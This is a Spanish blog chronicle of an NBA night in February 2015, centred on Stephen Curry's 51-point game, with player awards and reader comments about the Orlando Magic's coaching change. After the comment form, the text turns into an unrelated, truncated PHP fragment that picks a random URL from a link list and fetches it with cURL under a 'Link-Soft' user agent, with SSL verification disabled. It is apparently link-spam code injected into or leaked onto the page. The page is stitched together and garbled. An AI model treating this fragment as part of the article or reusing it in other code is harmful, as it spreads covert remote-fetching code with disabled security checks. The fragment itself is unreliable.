La Crónica: Get 50!

05 de February de 2015 por txusma

Ocurre con cierta regularidad: en una magnífica noche de baloncesto, llega Steph Curry y supera con creces todo lo que habíamos presenciado hasta su irrupción. Lo volvió a hacer anoche, cuando secuestró una jornada que estaba destinada a que hablásemos de Russell Westbrook y de los Hawks y de Harden y de los Grizzlies y de Whiteside.

Lo haremos, hablaremos de todos ellos, pero primero, antes de cualquier otra cosa… CURRY!!

Dallas Mavericks 114 – Golden State Warriors 128

En la crónica de ayer calificábamos a los Warriors de “tormenta de juego total”. La última víctima de dicho fenómeno meteorológico son los Mavs, que se veían ganadores en Oakland tras un arranque de partido pletórico antes de que Curry se desatase para ofrecernos una de las mayores exhibiciones individuales de la temporada. Los 51 puntos con 10 triples de Curry se llevaron todo por delante, incluyendo la renta de 22 puntos (40-18) que los Mavs habían construido en un primer periodo formidable por parte de los texanos. Las excelentes actuaciones de Parsons y Tyson Chandler empezaron a palidecer conforme avanzaron los minutos y Curry se iba adueñando del juego. Al descanso ya se llegó con un marcador ajustado (62-58) y lo mejor aún estaba por llegar: en el tercer cuarto, con los Mavs de nuevo anotando con facilidad, Curry logró 26 puntos por sí solo. Los Warriors tomaron la delantera y ya no la dejaron escapar. En el tramo final, con la victoria ya en la mano y 48 puntos en el haber de Curry, Draymond Green exclamó a su compañero: “Get 50!”, y eso hizo: anotó su décimo triple para irse hasta los 51 y reventar el ORACLE.

Washington Wizards 96 – Atlanta Hawks 105

La espectacular remontada de los Warriors les mantiene por delante de los Hawks en el fabuloso pulso que ambos equipos mantienen en lo alto de los standings y que convierte en todo un acontecimiento el duelo de mañana viernes (sí, Warriors-Hawks a la 1h30 de la madrugada del viernes al sábado). Porque los Hawks, después de ver interrumpida en New Orleans su racha de 19 victorias, volvieron a la senda ganadora para imponerse por tercera vez esta temporada a los Wizards. El fantástico duelo de bases All Star que protagonizaron John Wall y Jeff Teague quedó en tablas pero el de Atlanta contó con un mejor acompañamiento y deja a los Wizards en una situación delicada, con cuatro derrotas consecutivas y un solo partido de ventaja sobre Bulls y los emergentes Cavs, cada vez más favoritos para hacerse con la segunda posición del Este. Los Hawks, en cambio, cuentan ya con 8 partidos de ventaja al frente de la conferencia y llegarán sin presión y en un estado de forma inmejorable al gran partido frente a los Warriors.

Chicago Bulls 90 – Houston Rockets 101

Un nuevo tropiezo de los Bulls, el tercero consecutivo, volvió a poner de relieve los problemas del equipo dirigido por Thibodeau, que se mostró disgustado por la defensa (o la falta de) por parte de los suyos anoche en Houston. No funcionan estos Bulls, con Rose demasiado empeñado en lanzar triples y poco aplicado en la distribución, y ni rastro de la fiereza defensiva de tiempo atrás. Los Rockets son el reverso de esa moneda, exprimiendo cada recurso, limitando el impacto de la ausencia de Howard y maximizando el talento de Harden noche tras noche. Jimmy Butler, excelente, fue otra vez la constante a la pudieron abrazarse los Bulls pero no hubo suficiente. Su equipo no alcanzó el 35% en tiros de campo y cometió el doble de pérdidas que su rival, unos Rockets que se sitúan terceros del Oeste.

Oklahoma City Thunder 102 – New Orleans Pelicans 91

Pocas veces un partido previo al All Star acumula tanta trascendencia como el que disputaron anoche Thunder y Pelicans. Los dos perseguidores de los Suns por la octava plaza del Oeste se jugaban más que una victoria: el triunfo de los Pelicans habría abierto una brecha de tres partidos sobre los Thunder, que llegaban sin Kevin Durant y con muchas dudas y toda la presión. Aunque a lo que nosotros llamamos “presión”, Russell Westbrook le llama “dejádmelos a mí”. Russ igualó su mejor marca anotadora, 45 puntos, y casi por sí solo tumbó a los Pelicans. Anotó 19 en el primer periodo, mantuvo a los suyos en el partido mientras los Pelicans fueron mejores, y fue clave en el parcial de 13-0 que decidió el encuentro en los últimos 5 minutos. La gran labor de Ibaka frenando a Anthony Davis completó una gran jornada para los Thunder, que ven aliviados que, aunque les queda mucho por remar para meterse en Playoffs, el río ya no parece tan cuesta arriba.

El resto de la jornada

La lucha en el Este sigue bonita aunque no sea por la enorme calidad de los equipos implicados. Los Bucks se deshacieron en la prórroga de unos Lakers que parecían tener el partido ganado a falta de 30 segundos para el final del tiempo regular cuando dominaban el marcador por 6 puntos de diferencia. Un triple de Brandon Knight y otro prácticamente sobre la bocina de OJ Mayo llevaron el partido a una prórroga, donde ya no hubo color. Esta victoria deja a Milwaukee situado muy cómodamente en una sexta posición a la que ya no parecen aspirar los Heat, que ayer cayeron en Minnesota a pesar del partidazo de Hassan Whiteside. Precisamente Whiteside fue co-protagonista de la jugada tonta de la temporada, que acabó resultando fatal para las aspiraciones de su equipo. Los Heat son octavos con 21 victorias pero ya sienten el aliento en el cógote de los Nets, que ayer se impusieron claramente en Canadá. Décimos son los Pistons que ayer cayeron ante unos Pacers, con George Hill de nuevo titular, que no quieren perder comba en la batalla por la postemporada. Ahora mismo están empatados a 18 victorias con los Celtics, que también ganaron, ellos a unos decepcionantes Denver Nuggets. Los que ya no llegarán son los Orlando Magic, que encadenan 10 derrotas consecutivas. La última, anoche, ante los San Antonio Spurs.

En el Oeste, 8ª victoria consecutiva de los Memphis Grizzlies. Marc Gasol y Zach Randolph ofrecieron una clase magistral a los Favors, Kanter, Gobert y resto de la chiquillería. Suponemos que tomaron buenos apuntes. Con este trinufo, los de Tennessee mantienen la presión sobre los líderes, los Golden State Warriors.

PREMIOS

MVP: Los Warriors encajaron 42 puntos en los primeros 12 minutos pero Stephen Curry puso las cosas en su sitio con un tercer cuarto antológico: 6 de 7 en triples y 26 puntos totales. Al final fueron 51 puntos, 10 triples de 16 intentos, 4 rebotes y 4 asistencias. Semejante exhibición deja en segundo plano otra barbaridad de Russell Westbrook: 45 puntos, 6 rebotes y 6 asistencias.

Rookie: Gran temporada la de Elfrid Payton a pesar de la irregularidad propia de los jóvenes. Creo que le veremos muchos más partidos como el de ayer (14-6-9) durante su carrera. Jusuf Nurkic también estuvo muy inspirado con 14 puntos, 7 rebotes y 3 tapones. En el mismo partido Marcus Smart se quedó en 4 puntos pero lo compensó con 10 rebotes, 8 asistencias y 3 robos.

Sorpresa: Alan Anderson ahora sale de titular en los Brooklyn Nets y lo agradece con su primer partido de más de 20 puntos de la temporada.

Decepción: Louis Williams empezó bien la temporada pero actualmente no pasa por su mejor momento. Ayer se quedó en 2 puntos con un 1 de 11 en TC. Victor Oladipo lanzó 21 veces a canasta y solo anotó 5. Doloroso.

Esfuerzo en vano: Partidazo casi perfecto de Hassan Whiteside ante los Wolves con 24 puntos (12 de 13 en TC), 20 rebotes y 3 tapones. Tobias Harris también jugó uno de sus mejores partidos de la temporada al anotar 23 puntos, pillar 10 rebotes y repartir 10 asistencias. John Wall (24-7-9) , Tyson Chandler (21-17) y Carlos Boozer (28-9-4) también se dejaron el alma para que ganaran los suyos.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

17 comentarios a esta entrada

  1. dsromero dice:
    #1

    el % de TC de Oladipo me ha destrozado en el fantasy….

    lo de Curry y los Warriors espero que no se quede en algo parecido a lo de los pacers del año pasado que parecían intratables y se desinflaron despues del all-star de manera increible

      Citar

  2. Triceratops dice:
    #2

    ¿A que esperan los Magic para destituir al pseudo-entrenador?? Su balance es de 58-158 en dos temporadas y media.
    Me cuesta creer que haya algún entrenador en la historia con más de 200 partidos en la liga y que tenga un balance peor que el suyo.

      Citar

  3. Larry Bird 33 dice:
    #3

    Triceratops:
    ¿A que esperan los Magic para destituir al pseudo-entrenador?? Su balance es de 58-158 en dos temporadas y media.
    Me cuesta creer que haya algún entrenador en la historia con más de 200 partidos en la liga y que tenga un balance peor que el suyo.

    Parece ser que se tomará la decisión en el parón del All-Star. Personalmente me gustaría traer a George Karl, nunca entendí que lo echasen de Denver y me parece un entrenador perfecto para los Magic porque, como demostró en su etapa en Denver, no necesita una superestrella para formar un equipazo. Además su ritmo de juego rápido (a pesar de que no me gusta mucho eso del run&gun) favorecería a los Magic por su juventud y porque parece que Payton está más cómodo corriendo. Y defendiendo seguro que también mejoramos (lo cual es muy fácil todo hay que decirlo) porque con los jugadores que tenemos (Oladipo, Payton, Harkless,…) lo raro es que defendamos tan mal.
    ¿Tu qué opinas? Un saludo!

      Citar

  4. Nacho dice:
    #4

    Suena Orenga para los Magic

      Citar

  5. Blade Petrovic dice:
    #5

    Bomba Woj(aunque era bastante obvio). Magic fires Vaughn, Denise amd Triceraptors will be Happy

      Citar

  6. Triceratops dice:
    #6

    Blade Petrovic:
    Bomba Woj(aunque era bastante obvio). Magic fires Vaughn, Denise amd Triceraptors will be Happy

    jajajja, Siiiiiiiiii !!!!!!

    Por fin, a partir de ahora, el día 5 de Febrero debería ser día festivo de Orlando y que nadie trabaje ni vaya a las escuelas.
    Es que macho, vaya legado de 58-158 nos ha dejado este impresentable. Si algun día Txusma hace alguna pregunta de esas de Trivial, debería ser si hay algun otro coach en la historia con peor balance que éste pseudo-entrenador con más de 200 partidos a sus espaldas.

    Ahora suena Scott Skiles, hombre….yo hubiese preferido a alguno de la terna Mike Malone (el ex-Kings), George Karl, Marc Jackson, Nate McMIllan ó inclusive nombrar a un interino, esperar a que los Bulls pierdan un par de partido más, y fichar a Thibodeau.

    No obstante, si el elegido es Skiles, le daremos el beneficio de la duda y una oportunidad, aunque preferiría que fuese un contrato corto, nada de firmarle 4 años como al pseudo-entrenador.

    PD; Denise and Triceratops are the same person…

      Citar

  7. Triceratops dice:
    #7

    Ay que ver que retrasados están los americanos en estrategia. Para un espectador, genial, fomenta el espectaculo, pero el triple de Mayo es tremendamente evitable. A falta de 2 segundos con 3 arriba Lakers, tiene la bola Middleton a 7 metros y de espaldas al aro. Con lo facil que es darle un leñazo a Middleton en el brazo, lo mandas a los libres y practicamente el partido lo ganas.
    A todo esto, me encanta Kate Middleton, vaya jugadorazo!!, posiblemente de lo mejorcito en relación rendimiento/salario. Este verano tiene una Qualyfing Offer y con Jabari Parker por delante en la rotación de cara al futuro, lo normal es que se busque las habichuelas en otro equipo. Novias no le van a faltar.

      Citar

  8. Blade Petrovic dice:
    #8

    Eso de los cambios de nombre ente tu y azabel. Ya decia yo que 2 de los Magic en el mismo foro

      Citar

  9. Larry Bird 33 dice:
    #9

    Triceratops: jajajja, Siiiiiiiiii !!!!!!

    Por fin, a partir de ahora, el día 5 de Febrero debería ser día festivo de Orlando y que nadie trabaje ni vaya a las escuelas.
    Es que macho, vaya legado de 58-158 nos ha dejado este impresentable. Si algun día Txusma hace alguna pregunta de esas de Trivial, debería ser si hay algun otro coach en la historia con peor balance que éste pseudo-entrenador con más de 200 partidos a sus espaldas.

    Ahora suena Scott Skiles, hombre….yo hubiese preferido a alguno de la terna Mike Malone (el ex-Kings), George Karl, Marc Jackson, Nate McMIllan ó inclusive nombrar a un interino, esperar a que los Bulls pierdan un par de partido más, y fichar a Thibodeau.

    No obstante, si el elegido es Skiles, le daremos el beneficio de la duda y una oportunidad, aunque preferiría que fuese un contrato corto, nada de firmarle 4 años como al pseudo-entrenador.

    PD; Denise and Triceratops are the same person…

    Parece ser que se han adelantado (y menos mal) al All-Star. Por cierto si, hubo un entrenador que tiene peor % de victorias en 200 partido que nuestro antiguo inquilino (entrenador no lo era, al menos no ha demostrado entrenar a nadie en tres años) de banquillo se llama Sidney Lowe su marca es 79-228 25.7% de victorias. Semejante “hazaña” la consiguió en 5 temporadas entrenando a Minessota entre 1992 (solo estuvo al frente del equipo 53 partidos) y 1994 y a los Grizzlies entre el 2000 (último año en Vancouver) y el 2003 (en el 2003 únicamente duró 8 partidos, todos acabaron con derrota)).

      Citar

  10. Azabel dice:
    #10

    Blade Petrovic:
    Eso de los cambios de nombre ente tu y azabel. Ya decia yo que 2 de los Magic en el mismo foro

    no se con quien me estas confundiendo pero el dia de hoy yo no he comentado nada,

    en cuanto al entrenador de los Magics, no entiendo por que creen que la franquicia lo va a despedir, fue contratado para perder muchos muchos juegos y lograr altas selecciones del draft y lo ha conseguido
    las aspiraciones a ganar partido son las confundidas aqui

      Citar

  11. Triceratops dice:
    #11

    Larry Bird 33: Parece ser que se han adelantado (y menos mal) al All-Star. Por cierto si, hubo un entrenador que tiene peor % de victorias en 200 partido que nuestro antiguo inquilino (entrenador no lo era, al menos no ha demostrado entrenar a nadie en tres años) de banquillo se llama Sidney Lowe su marca es 79-228 25.7% de victorias. Semejante “hazaña” la consiguió en 5 temporadas entrenando a Minessota entre 1992 (solo estuvo al frente del equipo 53 partidos) y 1994 y a los Grizzlies entre el 2000 (último año en Vancouver) y el 2003 (en el 2003 únicamente duró 8 partidos, todos acabaron con derrota)).

    Gran dato. Pesimos numeros del primer entrenador de Pau, el cual, ahora recuerdo que también sufrió a otros dos célebres “coach” como Marc Iavaroni y Tony Barone..

      Citar

  12. Triceratops dice:
    #12

    Azabel: no se con quien me estas confundiendo pero el dia de hoy yo no he comentado nada,

    en cuanto al entrenador de los Magics, no entiendo por que creen que la franquicia lo va a despedir, fue contratado para perder muchos muchos juegos y lograr altas selecciones del draft y lo ha conseguido
    las aspiraciones a ganar partido son las confundidas aqui

    Se refiere a que te cambiaste de nick igual que yo.

    El primer año era de clara reconstrucción y tankeo y no se le puede achacar nada, el año pasado el equipo ya debió de ganar más partidos, y no quedarse en unas miseras 23 W. Y este año, bfffff al nivel que está el Este, el equipo debería estar peleando por Playoffs. Miras uno a uno el roster, y no hay tan mala plantilla para solo llevar 15 victorias y una progresión a 82 partidos de 23 victorias nuevamente.
    Sin ir más lejos, los Bucks sin Jabari ni Sanders, los Celtics sin Rondo y los Pacers sin George no tienen ni de lejos mejor equipo que los Magic y van por delante.

      Citar

  13. Ruxixón dice:
    #13

    Enhorabuena seguidores Magic,en especial a Denise aka Triceratops que hace mucho tiempo tenía a Vaughn en sus oraciones.El segundo parece que se hará cargo del equipo,su nombre se presta mucho al chiste: James Borrego.

    Por cierto,que el de los Bucks es Khris Middleton,no Kate,que ya extendemos nuestras redes hasta la realeza británica 😛

      Citar

  14. Triceratops dice:
    #14

    Siiii…..me confundi…aunque Kate no esta mal, yo le haria un marcaje ferreo en defensa, y unas buenas penetraciones al aro en ataque jajajaja

      Citar

  15. Triceratops dice:
    #15

    Wooooooo, tremendo concurso de triples, Irving, Harden, Curry, Thompson, Mathews, Korver, Redick y Belinelli. Para mi, por mombres, el mejor en mucho tiempo.

      Citar

  16. franitis dice:
    #16

    Nacho:
    Suena Orenga para los Magic

    Y también suena Michel… Están entre esos dos…

      Citar

  17. fofer dice:
    #17

    pues en la jugada tonta de la temporada me parece mas fallo de Norris Colé q otra cosa…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>